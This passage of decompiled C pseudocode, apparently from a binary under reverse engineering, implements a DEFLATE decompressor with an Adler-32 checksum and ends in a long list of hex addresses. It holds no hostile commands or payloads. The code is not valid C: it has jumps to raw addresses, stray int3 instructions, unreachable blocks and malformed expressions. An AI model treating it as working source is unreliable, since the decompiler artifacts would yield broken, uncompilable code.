														if(_t847 >=  *(_t1065 - 0x20)) {
															L283:
															 *_t1030 = 0x2a;
															goto L285;
														} else {
															L280:
															_t690 =  *_t847 & 0x000000ff;
															_t847 = _t847 + 1;
															L276:
															 *(_t1065 - 0x24) = _t690;
															_t618 =  *(_t1030 + 0x10) << 0x00000008 |  *(_t1065 - 0x24);
															_t898 = _t898 + 1;
															__eflags = _t898;
															 *(_t1030 + 0x10) = _t618;
															continue;
														}
													}
													goto L295;
												}
												goto L290;
											}
										} else {
											L253:
											while(1) {
												L254:
												__eflags = _t847 -  *(_t1065 - 0x20);
												if(_t847 >=  *(_t1065 - 0x20)) {
													break;
												}
												L255:
												_t695 = ( *_t847 & 0x000000ff) << _t1050;
												_t1050 = _t1050 + 8;
												_t968 = _t968 | _t695;
												_t847 = _t847 + 1;
												 *(_t1065 - 4) = _t968;
												_t618 = _t1050 & 0x00000007;
												__eflags = _t1050 - _t618;
												if(_t1050 < _t618) {
													continue;
												} else {
													goto L256;
												}
												goto L295;
											}
											L271:
											 *_t1030 = 0x20;
											goto L285;
										}
									}
								} else {
									L49:
									__eflags = _t1050 - 0xf;
									if(_t1050 < 0xf) {
										_t1021 =  *(_t847 + 1) & 0x000000ff;
										_t861 = _t1050;
										_t732 =  *_t847 & 0x000000ff;
										_t847 = _t847 + 2;
										_t1030 =  *(_t1065 - 0x14);
										 *(_t1065 - 0x18) = _t847;
										 *(_t1065 - 4) =  *(_t1065 - 4) | (_t1021 << 0x00000008 | _t732) << _t861;
										_t1050 = _t1050 + 0x10;
										__eflags = _t1050;
										_t968 =  *(_t1065 - 4);
									}
									_t725 =  *((short*)(_t1030 + 0x160 + (_t968 & 0x000003ff) * 2));
									 *(_t1065 - 0x1c) = _t725;
									__eflags = _t725;
									if(_t725 < 0) {
										L53:
										goto 0x311349;
										asm("int3");
										asm("int3");
										asm("int3");
										do {
											L54:
											_t727 = _t968 >> _t861;
											_t861 = _t861 + 1;
											_t847 =  *((short*)(_t1030 + 0x960 + ((_t727 & 0x00000001) +  !_t847) * 2));
											__eflags = _t847;
										} while (_t847 < 0);
										 *(_t1065 - 0x1c) = _t847;
										_t847 =  *(_t1065 - 0x18);
									} else {
										L52:
										_t861 = _t725 >> 9;
									}
									L56:
									_t618 =  *(_t1065 - 8);
									_t1050 = _t1050 - _t861;
									_t968 = _t968 >> _t861;
									 *(_t1065 - 4) = _t968;
									 *( *(_t1065 - 0x10)) = _t618;
									_t861 =  *(_t1065 - 0x1c);
									__eflags = _t861 & 0x00000100;
									if((_t861 & 0x00000100) != 0) {
										L83:
										_t171 = _t1065 - 0x10;
										 *_t171 =  *(_t1065 - 0x10) + 1;
										__eflags =  *_t171;
										goto L84;
									} else {
										L57:
										_t730 =  *(_t1065 - 0x10);
										 *(_t730 + 1) = _t861;
										 *(_t1065 - 0x10) = _t730 + 2;
										continue;
										do {
											do {
												while(1) {
													L39:
													_t860 =  *(_t1065 - 0x20) - _t847;
													__eflags = _t860 - 4;
													if(_t860 < 4) {
														goto L58;
													}
													goto L40;
												}
												L26:
												__eflags = _t870;
											} while (_t870 == 0);
											goto 0x3112e3;
											asm("int3");
											_t734 =  *_t740;
											 *_t1030 = _t734;
											_t1030 =  *(_t1065 - 0x14);
											__eflags = _t870 - 1;
											if(_t870 > 1) {
												L29:
												L36:
												goto 0x31131f;
												asm("int3");
												 *(_t968 + 1) =  *((intOrPtr*)(_t734 + 1));
												_t968 =  *(_t1065 - 4);
											}
											L38:
											_t86 = _t1065 - 0x10;
											 *_t86 =  *(_t1065 - 0x10) + _t870;
											__eflags =  *_t86;
											while(1) {
												L39:
												_t860 =  *(_t1065 - 0x20) - _t847;
												__eflags = _t860 - 4;
												if(_t860 < 4) {
													goto L58;
												}
												goto L40;
											}
											L33:
											 *(_t1065 - 0x10) = _t1030;
											_t1030 =  *(_t1065 - 0x14);
											 *(_t1065 - 0xc) = _t968;
											_t968 =  *(_t1065 - 4);
											 *(_t1065 - 8) = _t870;
											__eflags = _t870;
										} while (_t870 <= 0);
										goto 0x31130b;
										asm("int3");
										_t734 =  *_t624;
										 *_t1030 = _t734;
										_t1030 =  *(_t1065 - 0x14);
										__eflags = _t870 - 1;
										if(_t870 > 1) {
											goto L36;
										}
										goto L38;
									}
								}
							}
							L295:
							_t972 =  *(_t1065 - 4);
							L296:
							 *(_t1030 + 4) = _t1050;
							asm("bts ecx, esi");
							__eflags = _t1050 - 0x20;
							_t630 =  >=  ? 0 : 0;
							_t874 = 0 ^ _t630;
							__eflags = _t1050 - 0x40;
							_t631 =  >=  ? _t874 : _t630;
							 *(_t1030 + 0x20) =  *(_t1065 - 0x28);
							_t974 =  *(_t1065 - 0x10) -  *(_t1065 + 0x10);
							__eflags =  *(_t1065 + 0x18) & 0x00000009;
							 *(_t1030 + 0x24) =  *(_t1065 - 8);
							 *(_t1030 + 0x28) =  *(_t1065 - 0x38);
							 *((intOrPtr*)(_t1030 + 0x3c)) =  *((intOrPtr*)(_t1065 - 0x48));
							 *(_t1030 + 0x38) = _t874 - 0x00000001 & _t972;
							 *(_t1065 - 0x10) = _t974;
							 *((intOrPtr*)( *((intOrPtr*)(_t1065 + 8)))) = _t847 -  *(_t1065 - 0x3c);
							_t851 =  *(_t1065 - 0xc);
							 *( *(_t1065 + 0x14)) = _t974;
							if(( *(_t1065 + 0x18) & 0x00000009) != 0) {
								L297:
								__eflags = _t851;
								if(_t851 >= 0) {
									L298:
									_t1052 =  *(_t1030 + 0x1c);
									_t877 = _t1052 & 0x0000ffff;
									_t641 = (0x5e6ea9af * _t974 >> 0x20 >> 0xb) * 0x15b0;
									_t1053 = _t1052 >> 0x10;
									 *(_t1065 - 0x3c) = _t1053;
									_t978 =  *(_t1065 - 0x10) - _t641;
									__eflags =  *(_t1065 - 0x10);
									 *(_t1065 - 0x34) = _t978;
									if( *(_t1065 - 0x10) != 0) {
										L299:
										_t853 = _t978;
										do {
											L300:
											_t979 = 0;
											 *(_t1065 + 0x14) = 0;
											__eflags = _t853 - 7;
											if(_t853 > 7) {
												L301:
												goto 0x31149d;
												asm("int3");
												asm("int3");
												asm("int3");
												L302:
												_t1033 = _t1030 - _t641;
												__eflags = _t1033;
												do {
													L303:
													_t979 =  &(_t979[2]);
													_t879 = _t877 + ( *_t641 & 0x000000ff);
													_t880 = _t879 + ( *( *(_t1065 + 0x10) + 1) & 0x000000ff);
													_t881 = _t880 + ( *(2 +  *(_t1065 + 0x10)) & 0x000000ff);
													_t882 = _t881 + ( *( *(_t1065 + 0x10) + 3) & 0x000000ff);
													_t883 = _t882 + ( *( *(_t1065 + 0x10) + 4) & 0x000000ff);
													_t884 = _t883 + ( *( *(_t1065 + 0x10) + 5) & 0x000000ff);
													_t885 = _t884 + ( *( *(_t1065 + 0x10) + 6) & 0x000000ff);
													_t877 = _t885 + ( *( *(_t1065 + 0x10) + 7) & 0x000000ff);
													_t671 =  *(_t1065 + 0x10) + 8;
													_t1053 = _t1053 + _t879 + _t880 + _t881 + _t882 + _t883 + _t884 + _t885 + _t877;
													 *(_t1065 + 0x10) = _t671;
													__eflags = _t1033 + _t671 - _t853;
													_t641 =  *(_t1065 + 0x10);
												} while (_t1033 + _t671 < _t853);
												 *(_t1065 + 0x14) = _t979;
												 *(_t1065 - 0x3c) = _t1053;
											}
											L305:
											_t1030 = 0;
											 *((intOrPtr*)(_t1065 + 8)) = 0;
											__eflags = _t979 - _t853;
											if(_t979 < _t853) {
												L306:
												__eflags = _t853 - _t979 - 2;
												if(_t853 - _t979 >= 2) {
													L307:
													_t651 =  *(_t1065 + 0x14);
													_t1056 =  *(_t1065 + 0x10);
													_t854 = 0;
													_t990 = (_t853 - _t651 - 2 >> 1) + 1;
													__eflags = _t990;
													 *(_t1065 + 0x14) = _t651 + _t990 * 2;
													do {
														L308:
														_t878 = _t877 + ( *_t1056 & 0x000000ff);
														_t654 =  *(_t1056 + 1) & 0x000000ff;
														_t1030 = _t1030 + _t878;
														_t1056 = 2 + _t1056;
														_t877 = _t878 + _t654;
														_t854 = _t854 + _t877;
														_t990 = _t990 - 1;
														__eflags = _t990;
													} while (_t990 != 0);
													_t979 =  *(_t1065 + 0x14);
													 *(_t1065 + 0x10) = _t1056;
													_t1053 =  *(_t1065 - 0x3c);
													 *((intOrPtr*)(_t1065 + 8)) = _t854;
													_t853 =  *(_t1065 - 0x34);
												}
												L310:
												__eflags = _t979 - _t853;
												if(_t979 < _t853) {
													_t984 =  *(_t1065 + 0x10);
													_t877 = _t877 + ( *_t984 & 0x000000ff);
													_t1053 = _t1053 + _t877;
													_t985 =  &(_t984[1]);
													__eflags = _t985;
													 *(_t1065 + 0x10) = _t985;
												}
												L312:
												_t641 =  *((intOrPtr*)(_t1065 + 8)) + _t1030;
												_t1053 = _t1053 + _t641;
												__eflags = _t1053;
											}
											L313:
											L314:
											_t877 = _t877 + (_t641 * _t877 >> 0x20 >> 0xf) * 0xffff000f;
											_t641 = (0x80078071 * _t1053 >> 0x20 >> 0xf) * 0xffff000f;
											_t1053 = _t1053 + _t641;
											_t586 = _t1065 - 0x10;
											 *_t586 =  *(_t1065 - 0x10) - _t853;
											__eflags =  *_t586;
											_t853 = 0x15b0;
											 *(_t1065 - 0x3c) = _t1053;
											 *(_t1065 - 0x34) = 0x15b0;
										} while ( *_t586 != 0);
										goto 0x3114c6;
										asm("int3");
									}
									L316:
									_t1055 = (_t1053 << 0x10) + _t877;
									 *(_t1030 + 0x1c) = _t1055;
									__eflags = _t851;
									if(_t851 == 0) {
										__eflags =  *(_t1065 + 0x18) & 0x00000001;
										if(( *(_t1065 + 0x18) & 0x00000001) != 0) {
											__eflags = _t1055 -  *(_t1030 + 0x10);
											_t851 =  !=  ? 0xfffffffe : _t851;
											__eflags = _t851;
										}
									}
								}
							}
							L319:
							return _t851;
							L320:
							L58:
							__eflags = _t1050 - 0xf;
							if(_t1050 >= 0xf) {
								L75:
								_t603 =  *((short*)(_t1030 + 0x160 + (_t968 & 0x000003ff) * 2));
								 *(_t1065 - 8) = _t603;
								__eflags = _t603;
								if(_t603 < 0) {
									L77:
									goto 0x311372;
									asm("int3");
									asm("int3");
									asm("int3");
									do {
										L78:
										_t605 = _t968 >> _t860;
										_t860 = _t860 + 1;
										_t847 =  *((short*)(_t1030 + 0x960 + ((_t605 & 0x00000001) +  !_t847) * 2));
										__eflags = _t847;
									} while (_t847 < 0);
									 *(_t1065 - 8) = _t847;
									_t847 =  *(_t1065 - 0x18);
								} else {
									L76:
									_t860 = _t603 >> 9;
									_t618 = _t603 & 0x000001ff;
									 *(_t1065 - 8) = _t618;
								}
								L80:
								_t968 = _t968 >> _t860;
								_t1050 = _t1050 - _t860;
								_t861 =  *(_t1065 - 8);
								 *(_t1065 - 4) = _t968;
								__eflags = _t861 - 0x100;
								if(_t861 >= 0x100) {
									goto L84;
								} else {
									L81:
									_t769 =  *(_t1065 - 0x10);
									__eflags = _t769 -  *((intOrPtr*)(_t1065 - 0x40));
									if(_t769 >=  *((intOrPtr*)(_t1065 - 0x40))) {
										L240:
										 *(_t1065 - 0xc) = 2;
										 *_t1030 = 0x18;
										goto L292;
									} else {
										L82:
										 *_t769 = _t861;
										 *(_t1065 - 0x10) = _t769 + 1;
										continue;
									}
								}
							} else {
								L59:
								__eflags = _t860 - 2;
								if(_t860 >= 2) {
									L73:
									_t969 =  *(_t847 + 1) & 0x000000ff;
									_t625 =  *_t847 & 0x000000ff;
									_t847 = _t847 + 2;
									_t860 = _t1050;
									 *(_t1065 - 0x18) = _t847;
									 *(_t1065 - 4) =  *(_t1065 - 4) | _t969 << _t1050 + 0x00000008 | _t625 << _t860;
									_t1050 = _t1050 + 0x10;
									__eflags = _t1050;
									_t968 =  *(_t1065 - 4);
									goto L74;
								} else {
									do {
										L60:
										_t618 = _t968 & 0x000003ff;
										_t1031 =  *((short*)(_t1030 + 0x160 + _t618 * 2));
										__eflags = _t1031;
										if(_t1031 < 0) {
											L64:
											__eflags = _t1050 - 0xa;
											if(_t1050 <= 0xa) {
												goto L69;
											} else {
												L65:
												 *(_t1065 - 0x1c) = _t860;
												while(1) {
													L67:
													_t1031 =  *((short*)( *(_t1065 - 0x14) + 0x960 + ((_t968 >> _t860 & 0x00000001) +  !_t1031) * 2));
													_t860 =  *(_t1065 - 0x1c) + 1;
													 *(_t1065 - 0x1c) = _t860;
													__eflags = _t1031;
													if(_t1031 >= 0) {
														goto L74;
													}
													L68:
													_t618 = _t860 + 1;
													__eflags = _t1050 - _t618;
													if(_t1050 >= _t618) {
														continue;
													} else {
														goto L69;
													}
													goto L295;
												}
												goto L74;
											}
										} else {
											L61:
											_t1035 = _t1031 >> 9;
											__eflags = _t1035;
											if(_t1035 == 0) {
												L69:
												_t1030 =  *(_t1065 - 0x14);
												L70:
												__eflags = _t847 -  *(_t1065 - 0x20);
												if(_t847 >=  *(_t1065 - 0x20)) {
													L239:
													 *_t1030 = 0x17;
													goto L285;
												} else {
													goto L71;
												}
											} else {
												L62:
												__eflags = _t1050 - _t1035;
												if(_t1050 >= _t1035) {
													L74:
													_t1030 =  *(_t1065 - 0x14);
													goto L75;
												} else {
													L63:
													goto L69;
												}
											}
										}
										goto L295;
										L71:
										_t860 = _t1050;
										_t675 = ( *_t847 & 0x000000ff) << _t860;
										_t847 = _t847 + 1;
										_t968 = _t968 | _t675;
										 *(_t1065 - 0x18) = _t847;
										_t1050 = _t1050 + 8;
										 *(_t1065 - 4) = _t968;
										__eflags = _t1050 - 0xf;
									} while (_t1050 < 0xf);
									goto L75;
								}
							}
							goto L295;
						}
					}
					L142:
					 *(_t1065 - 0xc) = 0x40 + _t600 * 0xda0 + _t1030;
					memset(_t1065 - 0xd0, 0, 0x40);
					memset( *(_t1065 - 0xc) + 0x120, 0, 0x800);
					memset( *(_t1065 - 0xc) + 0x920, 0, 0x480);
					_t903 = 0;
					_t1068 = _t1068 + 0x24;
					_t1003 = _t1030 + ( *(_t1030 + 0x18) + 0xb) * 4;
					 *(_t1065 - 0x44) = _t1003;
					if( *_t1003 > 0) {
						L143:
						_t1030 =  *(_t1065 - 0xc);
						do {
							L144:
							_t845 =  *(_t903 + _t1030) & 0x000000ff;
							_t903 = _t903 + 1;
							 *((intOrPtr*)(_t1065 + _t845 * 4 - 0xd0)) =  *((intOrPtr*)(_t1065 + _t845 * 4 - 0xd0)) + 1;
						} while (_t903 <  *_t1003);
					}
					L145:
					goto 0x3113d7;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					L146:
					 *(_t1065 - 0x8c) = _t903;
					 *(_t1065 - 0x90) = _t903;
					 *(_t1065 - 0x2c) = _t903;
					 *(_t1065 - 0x30) = _t903;
					do {
						L147:
						_t782 =  *((intOrPtr*)(_t1065 + _t1003 - 0xd4));
						_t905 = _t903 + _t782 + _t903 + _t782;
						_t1030 = _t1030 + _t782;
						_t783 =  *((intOrPtr*)(_t1065 + _t1003 - 0xd0));
						 *(_t1065 - 0x30) =  *(_t1065 - 0x30) + _t783;
						 *((intOrPtr*)(_t1065 + _t1003 - 0x90)) = _t905;
						_t784 =  *((intOrPtr*)(_t1065 + _t1003 - 0xcc));
						_t907 = _t905 + _t783 + _t905 + _t783;
						 *(_t1065 - 0x2c) =  *(_t1065 - 0x2c) + _t784;
						 *((intOrPtr*)(_t1065 + _t1003 - 0x8c)) = _t907;
						_t903 = _t907 + _t784 + _t907 + _t784;
						 *(_t1065 + _t1003 - 0x88) = _t903;
						_t1003 = _t1003 + 0xc;
					} while (_t1003 <= 0x40);
					 *(_t1065 - 0x4c) = _t903;
					 *(_t1065 - 0x24) = _t1030;
					_t1030 =  *(_t1065 - 0x14);
					_t910 =  *(_t1065 - 0x24) +  *(_t1065 - 0x2c) +  *(_t1065 - 0x30);
					if( *(_t1065 - 0x4c) == 0x10000 || _t910 <= 1) {
						L150:
						_t787 =  *(_t1065 - 0x44);
						 *(_t1065 - 0x30) = 0xffffffff;
						 *(_t1065 - 0x4c) = 0;
						if( *_t787 > 0) {
							L151:
							_t1064 =  *(_t1065 - 0x4c);
							do {
								L152:
								L153:
								_t922 =  *(_t1064 + _t787) & 0x000000ff;
								 *(_t1065 - 0x44) = _t922;
								if(_t922 != 0) {
									L154:
									_t824 =  *(_t1065 + _t922 * 4 - 0x90);
									 *(_t1065 - 0x2c) = _t824;
									 *(_t1065 + _t922 * 4 - 0x90) = _t824 + 1;
									 *(_t1065 - 0x24) = _t922;
									if(_t922 != 0) {
										L155:
										do {
											L156:
											 *(_t1065 - 0x2c) =  *(_t1065 - 0x2c) >> 1;
											_t844 =  *(_t1065 - 0x24) - 1;
											_t1003 = _t1003 + _t1003 |  *(_t1065 - 0x2c) & 0x00000001;
											 *(_t1065 - 0x24) = _t844;
										} while (_t844 != 0);
										_t922 =  *(_t1065 - 0x44);
									}
									L158:
									if(_t922 > 0xa) {
										L164:
										_t828 =  *(_t1065 - 0xc) + 0x120 + (_t1003 & 0x000003ff) * 2;
										_t847 =  *(_t1065 - 0x30);
										 *(_t1065 - 0x44) = _t828;
										_t829 =  *_t828;
										 *(_t1065 - 0x2c) = _t829;
										__eflags = _t829;
										if(_t829 == 0) {
											 *( *(_t1065 - 0x44)) = _t847;
											_t829 = _t847;
											_t847 = _t847 - 2;
											__eflags = _t847;
											 *(_t1065 - 0x2c) = _t829;
											 *(_t1065 - 0x30) = _t847;
										}
										L166:
										_t1011 = _t1003 >> 9;
										__eflags = _t922 - 0xb;
										if(_t922 > 0xb) {
											L167:
											_t923 = _t922 + 0xfffffff5;
											__eflags = _t923;
											 *(_t1065 - 0x24) = _t923;
											_t924 =  *(_t1065 - 0x2c);
											do {
												L168:
												_t1011 = _t1011 >> 1;
												_t834 = 0x48f - _t924 - (_t1011 & 0x00000001);
												_t927 =  *( *(_t1065 - 0xc) + 0x91e) & 0x0000ffff;
												__eflags = _t927;
												if(_t927 != 0) {
													_t924 = _t927;
												} else {
													 *( *(_t1065 - 0xc) + _t834 * 2) = _t847;
													_t835 =  *(_t1065 - 0x30);
													_t924 = _t835;
													_t836 = _t835 - 2;
													 *(_t1065 - 0x30) = _t836;
													_t847 = _t836;
												}
												L171:
												_t361 = _t1065 - 0x24;
												 *_t361 =  *(_t1065 - 0x24) - 1;
												__eflags =  *_t361;
											} while ( *_t361 != 0);
											 *(_t1065 - 0x2c) = _t924;
											_t829 = _t924;
										}
										L173:
										_t1003 = (_t1011 >> 0x00000001 & 0x00000001) - _t829;
										__eflags = _t1003;
										 *( *(_t1065 - 0xc) + 0x91e + _t1003 * 2) = _t1064;
									} else {
										L159:
										_t841 = (_t922 << 0x00000009 | _t1064) & 0x0000ffff;
										 *(_t1065 - 0x44) = _t841;
										if(_t1003 < 0x400) {
											L160:
											goto 0x311401;
											asm("int3");
											asm("int3");
											asm("int3");
											L161:
											_t842 = _t841 << _t922;
											 *(_t1065 - 0x4c) = _t842 + _t842;
											_t932 =  *(_t1065 - 0xc) + _t1003 * 2 + 0x120;
											do {
												L162:
												 *_t932 = _t1030;
												_t1003 = _t1003 + _t842;
												_t932 =  &(_t932[ *(_t1065 - 0x4c)]);
											} while (_t1003 < 0x400);
											_t1030 =  *(_t1065 - 0x14);
										}
									}
								}
								L174:
								_t787 =  *(_t1030 + 0x18);
								_t1064 = _t1064 + 1;
							} while (_t1064 <  *((intOrPtr*)(_t1030 + 0x2c + _t787 * 4)));
							goto 0x311417;
							asm("int3");
						}
						L176:
						if( *(_t1030 + 0x18) != 2) {
							L217:
							 *(_t1030 + 0x18) =  *(_t1030 + 0x18) - 1;
							goto L141;
						} else {
							L177:
							_t911 = 0;
							while(1) {
								L178:
								_t1004 =  *(_t1065 - 4);
								while(1) {
									L179:
									 *(_t1065 - 8) = _t911;
									if(_t911 >=  *(_t1030 + 0x30) +  *(_t1030 + 0x2c)) {
										break;
									}
									L180:
									if(_t1064 >= 0xf) {
										L197:
										_t802 =  *((short*)(_t1030 + 0x1ca0 + (_t1004 & 0x000003ff) * 2));
										 *(_t1065 - 0x28) = _t802;
										if(_t802 < 0) {
											L199:
											L200:
											do {
												L201:
												 *(_t1065 - 0x28) =  !( *(_t1065 - 0x28));
												_t804 = _t1004 >> _t911;
												_t911 = _t911 + 1;
												_t618 =  *((short*)(_t1030 + 0x24a0 + ((_t804 & 0x00000001) +  *(_t1065 - 0x28)) * 2));
												 *(_t1065 - 0x28) = _t618;
												__eflags = _t618;
											} while (__eflags < 0);
										} else {
											L198:
											_t911 = _t802 >> 9;
											_t618 = _t802 & 0x000001ff;
											 *(_t1065 - 0x28) = _t618;
										}
										L202:
										_t1004 = _t1004 >> _t911;
										_t1050 = _t1064 - _t911;
										 *(_t1065 - 4) = _t1004;
										 *(_t1065 - 0x1c) = _t1050;
										if(_t618 >= 0x10) {
											L204:
											if(__eflags != 0) {
												L207:
												_t912 =  *((char*)(_t618 + 0x120ff0));
												 *(_t1065 - 0x38) = _t912;
												__eflags = _t1050 - _t912;
												if(_t1050 >= _t912) {
													L211:
													_t1050 = _t1050 - _t912;
													 *(_t1065 - 0x1c) = _t1050;
													_t913 =  *(_t1065 - 0x14);
													_t1046 = ((0x00000001 << _t912) - 0x00000001 & _t1004) +  *((char*)(_t618 + 0x120ff8));
													__eflags =  *(_t1065 - 0x28) - 0x10;
													_t808 =  *(_t1065 - 8);
													 *(_t1065 - 4) = _t1004 >> _t912;
													if(__eflags != 0) {
														_t1007 = 0;
														__eflags = 0;
													} else {
														_t1007 =  *(_t808 + _t913 + 0x2923) & 0x000000ff;
													}
													L214:
													memset(_t808 + _t913 + 0x2924, _t1007, _t1046);
													_t1068 = _t1068 + 0xc;
													_t911 =  *(_t1065 - 8) + _t1046;
													_t1030 =  *(_t1065 - 0x14);
													L178:
													_t1004 =  *(_t1065 - 4);
													continue;
												} else {
													while(1) {
														L208:
														__eflags = _t847 -  *(_t1065 - 0x20);
														if(_t847 >=  *(_t1065 - 0x20)) {
															break;
														}
														L209:
														_t618 = ( *_t847 & 0x000000ff) << _t1050;
														_t847 = _t847 + 1;
														_t912 =  *(_t1065 - 0x38);
														_t1004 = _t1004 | _t618;
														_t1050 = _t1050 + 8;
														 *(_t1065 - 0x18) = _t847;
														 *(_t1065 - 4) = _t1004;
														__eflags = _t1050 - _t912;
														if(_t1050 < _t912) {
															continue;
														} else {
															L210:
															_t618 =  *(_t1065 - 0x28);
															goto L211;
														}
														goto L295;
													}
													L251:
													 *_t1030 = 0x12;
													goto L285;
												}
											} else {
												L205:
												_t812 =  *(_t1065 - 8);
												__eflags = _t812;
												if(_t812 == 0) {
													L268:
													_t689 = _t812 | 0xffffffff;
													 *_t1030 = 0x11;
													goto L291;
												} else {
													L206:
													_t618 =  *(_t1065 - 0x28);
													goto L207;
												}
											}
										} else {
											L203:
											_t917 =  *(_t1065 - 8);
											 *(_t1030 + 0x2924 + _t917) = _t618;
											_t911 = _t917 + 1;
											continue;
										}
									} else {
										L181:
										if( *(_t1065 - 0x20) - _t847 >= 2) {
											L195:
											_t1008 =  *(_t847 + 1) & 0x000000ff;
											_t815 =  *_t847 & 0x000000ff;
											_t847 = _t847 + 2;
											_t911 = _t1064;
											 *(_t1065 - 0x18) = _t847;
											 *(_t1065 - 4) =  *(_t1065 - 4) | _t1008 << _t1064 + 0x00000008 | _t815 << _t911;
											_t1064 = _t1064 + 0x10;
											__eflags = _t1064;
											_t1004 =  *(_t1065 - 4);
											goto L196;
										} else {
											do {
												L182:
												_t618 = _t1004 & 0x000003ff;
												_t1047 =  *((short*)(_t1030 + 0x1ca0 + _t618 * 2));
												if(_t1047 < 0) {
													L186:
													__eflags = _t1064 - 0xa;
													if(__eflags <= 0) {
														goto L191;
													} else {
														L187:
														L188:
														 *(_t1065 - 0x24) = _t911;
														while(1) {
															L189:
															_t1047 =  *((short*)( *(_t1065 - 0x14) + 0x24a0 + ((_t1004 >> _t911 & 0x00000001) +  !_t1047) * 2));
															_t911 =  *(_t1065 - 0x24) + 1;
															 *(_t1065 - 0x24) = _t911;
															__eflags = _t1047;
															if(__eflags >= 0) {
																goto L196;
															}
															L190:
															_t618 = _t911 + 1;
															__eflags = _t1064 - _t618;
															if(__eflags >= 0) {
																continue;
															} else {
																goto L191;
															}
															goto L295;
														}
														goto L196;
													}
												} else {
													L183:
													_t1049 = _t1047 >> 9;
													if(_t1049 == 0) {
														L191:
														_t1030 =  *(_t1065 - 0x14);
														L192:
														if(_t847 >=  *(_t1065 - 0x20)) {
															L250:
															 *_t1030 = 0x10;
															goto L285;
														} else {
															goto L193;
														}
													} else {
														L184:
														if(_t1064 >= _t1049) {
															L196:
															_t1030 =  *(_t1065 - 0x14);
															goto L197;
														} else {
															L185:
															goto L191;
														}
													}
												}
												goto L295;
												L193:
												_t911 = _t1064;
												_t819 = ( *_t847 & 0x000000ff) << _t911;
												_t847 = _t847 + 1;
												_t1004 = _t1004 | _t819;
												 *(_t1065 - 0x18) = _t847;
												_t1064 = _t1064 + 8;
												 *(_t1065 - 4) = _t1004;
											} while (_t1064 < 0xf);
											goto L197;
										}
									}
									goto L295;
								}
								L215:
								_t1005 =  *(_t1030 + 0x2c);
								_t791 =  *(_t1030 + 0x30) + _t1005;
								__eflags = _t791 - _t911;
								if(_t791 != _t911) {
									L269:
									_t689 = _t791 | 0xffffffff;
									 *_t1030 = 0x15;
									goto L291;
								} else {
									L216:
									memcpy(_t1030 + 0x40, _t1030 + 0x2924, _t1005);
									_t797 =  *(_t1030 + 0x2c) + 0x2924 + _t1030;
									__eflags = _t797;
									memcpy(_t1030 + 0xde0, _t797,  *(_t1030 + 0x30));
									_t1068 = _t1068 + 0x18;
									goto L217;
								}
								goto L295;
							}
						}
					} else {
						L267:
						 *(_t1065 - 0xc) = 0xffffffff;
						 *_t1030 = 0x23;
						goto L292;
					}
					goto L295;
				}
			}

0x00115a85
0x00115a85
0x00115a85
0x00115a86
0x00115a88
0x00115a8a
0x00115a8c
0x00115a8d
0x00115a8f
0x00115a91
0x00115a98
0x00115a9e
0x00115aa6
0x00115aa9
0x00115aae
0x00115ab3
0x00115ab8
0x00115abd
0x00115ac5
0x00115acd
0x00115ad5
0x00115add
0x00115ae5
0x00115aeb
0x00115af3
0x00115af7
0x00115afc
0x00115b01
0x00115b06
0x00115b0b
0x00115b10
0x00115b15
0x00115b1d
0x00115b22
0x00115b2a
0x00115b34
0x00115b3e
0x00115c49
0x00115c49
0x00115c49
0x00115c4e
0x00000000
0x00000000
0x001160ee
0x001160ee
0x001155e8
0x001155e8
0x001155eb
0x001155ed
0x001155f0
0x00000000
0x00000000
0x001155f6
0x001155fc
0x001155ff
0x00115602
0x00000000
0x00115608
0x00115608
0x00115608
0x0011560b
0x0011560d
0x00115611
0x00115613
0x00115616
0x0011561e
0x00115623
0x00115626
0x00115626
0x00115629
0x00115629
0x00115633
0x0011563b
0x0011563e
0x00115640
0x00115649
0x00115649
0x0011564e
0x0011564f
0x00115650
0x00115651
0x00115651
0x00115655
0x00115657
0x0011565b
0x0011565d
0x00115665
0x00115665
0x00115669
0x0011566c
0x00115642
0x00115642
0x00115644
0x00115644
0x0011566f
0x0011566f
0x00115671
0x00115673
0x00115676
0x00115679
0x0011567f
0x0011584a
0x0011584a
0x00115850
0x00115853
0x00115859
0x001160f6
0x001160f6
0x001160fd
0x00116103
0x00116109
0x0011610c
0x0011610f
0x00116111
0x0011614e
0x0011614e
0x00116151
0x00115404
0x0011540b
0x00115413
0x00115416
0x00115418
0x00115426
0x00115426
0x0011542b
0x0011542c
0x0011542d
0x00115430
0x00115430
0x00115434
0x00115436
0x0011543c
0x00115444
0x00115444
0x00115448
0x0011544b
0x0011544e
0x0011541a
0x0011541a
0x0011541c
0x0011541f
0x0011541f
0x00115451
0x00115451
0x00115453
0x00115455
0x0011545c
0x00115463
0x00115466
0x00115469
0x0011546c
0x0011546e
0x001154ae
0x001154b1
0x001154b4
0x001154b7
0x001154b9
0x001154c5
0x001154c5
0x001154cd
0x001154d0
0x001154d5
0x001154d8
0x001154dc
0x001154df
0x001154e1
0x001154e4
0x0011551f
0x0011551f
0x00115522
0x00115586
0x00115586
0x0011558b
0x00115590
0x00115590
0x00115593
0x00115596
0x0011559c
0x0011559f
0x001155a3
0x001155a6
0x001155a9
0x001155ac
0x001155ac
0x00000000
0x00115524
0x00115524
0x00115524
0x00115527
0x00000000
0x00115529
0x00115529
0x00115529
0x0011552e
0x00115534
0x00115536
0x00115539
0x00115540
0x00115540
0x00115542
0x00115544
0x00115547
0x0011554a
0x0011554d
0x00115550
0x00115550
0x00115554
0x00115557
0x0011555d
0x00115560
0x00115563
0x00115566
0x00115569
0x0011556c
0x00000000
0x00000000
0x00000000
0x00000000
0x0011556c
0x00115527
0x00000000
0x001154e6
0x001154e6
0x001154e6
0x001154e6
0x001154e8
0x001154e9
0x001154ec
0x001154ee
0x00000000
0x00000000
0x001154f4
0x001154f7
0x001154fa
0x001161ff
0x001161ff
0x00116206
0x00000000
0x00115500
0x00115500
0x00115512
0x00115515
0x00115518
0x0011551a
0x00000000
0x0011551a
0x00000000
0x001154fa
0x001155e8
0x001155e8
0x001155eb
0x001155ed
0x001155f0
0x00000000
0x00000000
0x00000000
0x001155f0
0x00000000
0x001155e8
0x001154bb
0x001154bb
0x001154bb
0x001154bf
0x001163a4
0x001163a4
0x001163a7
0x00000000
0x00000000
0x00000000
0x00000000
0x001154bf
0x00115470
0x00115470
0x00115470
0x00115472
0x00115497
0x0011549c
0x001154a1
0x001154a3
0x001154a5
0x001154a5
0x001154a5
0x001154a8
0x001154ab
0x00000000
0x00115474
0x00115474
0x00115474
0x00115474
0x00115477
0x00000000
0x00000000
0x0011547d
0x00115482
0x00115484
0x00115485
0x00115488
0x0011548a
0x0011548d
0x00115490
0x00115493
0x00115495
0x00000000
0x00000000
0x00000000
